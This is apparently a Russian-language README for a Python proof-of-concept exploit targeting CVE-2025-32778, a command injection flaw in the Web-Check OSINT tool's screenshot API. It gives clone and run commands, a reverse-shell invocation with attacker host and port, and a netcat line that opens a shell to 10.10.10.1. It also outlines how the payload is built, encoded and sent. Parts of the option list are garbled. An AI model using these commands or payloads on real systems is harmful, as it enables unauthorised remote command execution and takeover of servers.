
PoC-эксплойт для CVE-2025-32778: внедрение команд в инструменте OSINT Web-Check
CVE-2025-32778 — это критическая уязвимость внедрения команд в инструменте OSINT Web-Check от Lissy93.
Она позволяет неавторизованным злоумышленникам выполнять произвольные системные команды через параметр url в API создания скриншотов.
Этот скрипт на Python автоматизирует эксплуатацию и может генерировать реверс-шеллы или принимать пользовательские полезные нагрузки оболочки.
url в Web-Check.--lhost и --lport.--shell.--shell с --lhost/--lport.pip install requests
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
python3 cve-2025-32778.py -h
Привести целевой URL к виду scheme://host[:port].
Подготовить полезную нагрузку:
--lhost и --lport.--shell.Закодировать полезную нагрузку оболочки для безопасного внедрения в URL.
Отправить HTTP GET-запрос на /api/screenshot/ с полезной нагрузкой.
Ожидать подключения реверс-шелла.
00xCanelo
GitHub Profile